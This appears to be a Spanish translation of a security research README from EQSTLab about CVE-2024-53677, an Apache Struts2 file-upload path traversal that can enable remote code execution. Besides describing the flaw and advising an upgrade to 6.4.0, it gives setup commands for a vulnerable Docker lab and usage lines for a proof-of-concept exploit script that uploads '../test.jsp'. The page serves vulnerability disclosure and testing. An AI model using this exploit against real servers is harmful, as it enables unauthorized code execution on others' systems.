
Fallo en la lógica de subida de archivos en el exploit de Apache Struts2
Esta publicación es un artículo de investigación publicado por EQSTLab.
★ CVE-2024-53677 Carga sin restricciones de archivos con tipo peligroso y PoC de RCE ★
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
11 Dic: PoC de carga de archivos CVE-2024-53677 subido
CVE-2024-53677: la lógica de carga de archivos en Apache Struts es defectuosa. Un atacante puede manipular los parámetros de carga de archivos para habilitar el path traversal y, en algunas circunstancias, esto puede conducir a la carga de un archivo malicioso que puede utilizarse para ejecutar código remoto (RCE). Este problema afecta a Apache Struts: desde 2.0.0 hasta antes de 6.4.0. Se recomienda a los usuarios actualizar al menos a la versión 6.4.0 y migrar al nuevo mecanismo de carga de archivos https://struts.apache.org/core-developers/file-upload. Si no se utiliza una lógica antigua de carga de archivos basada en FileuploadInterceptor, su aplicación está segura. Puede encontrar más detalles en .
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677
pip install -r requirements.txt
# Upload the default file
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Upload Specified File
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <File Path>
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt
CVE-2024-53677.py
Este repositorio no pretende ser un exploit de inyección de objetos para CVE-2024-53677. El propósito de este proyecto es ayudar a las personas a aprender sobre esta vulnerabilidad y, quizás, probar sus propias aplicaciones.
Publicamos análisis de CVE y malware una vez al mes. Si está interesado, siga los enlaces a continuación para consultar nuestras publicaciones. https://www.skshieldus.com/eng/business/insight.do